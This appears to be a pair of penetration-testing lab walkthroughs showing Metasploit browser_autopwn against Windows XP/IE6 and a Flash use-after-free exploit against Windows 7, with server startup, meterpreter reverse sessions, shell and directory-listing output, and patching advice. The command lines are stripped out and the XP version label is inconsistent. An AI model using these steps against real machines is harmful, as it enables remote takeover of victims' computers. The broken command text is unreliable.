Metasploit Browser Autopwn – Windows XP SP2
Victim: Windows XP SP3 (Java 6u25, IE6)
Step 1 – Starting the Browser Autopwn Server
Run msfconsole, load the browser_autopwn module and set all required options.
msf >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.
The Browser Autopwn Server is now running and waiting for victims to browse to the url http://192.168.1.12
Step 2 – Pwning the Victim
On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a meterpreter session.
192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) >
[*] Starting interaction with 1...meterpreter >
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>
Victim
C:\Documents and Settings\IEUser\Desktop>
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\Documents and Settings\IEUser\Desktop>
You now have shell access to the Windows XP SP3 Victim with the same access as the user who navigated to the exploit url.
Solution
Keep your software fully updated (e.g. Windows, Web Browsers, Java, etc…) and uninstall unused applications.
Tags: metasploit
Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1
Victim: Windows 7 Enterprise 32-bit (Adobe Flashplayer 18.0.0.203, Firefox 39)
Step 1 – Starting the Exploit Server
Run msfconsole, load adobe-flash-opaque-background-uaf and set all required options.
msf >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Local IP: http://192.168.1.12:80/
[*] Server started.
Step 2 – Exploiting the Victim Machine
On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
This will trigger the adobe-flash-opaque-background-uaf exploit and launch a meterpreter session.
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Starting interaction with 1...
meterpreter >
Server username: IE8Win7\IEUser
meterpreter >
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
Solution
Uninstall flashplayer.
Tags: metasploit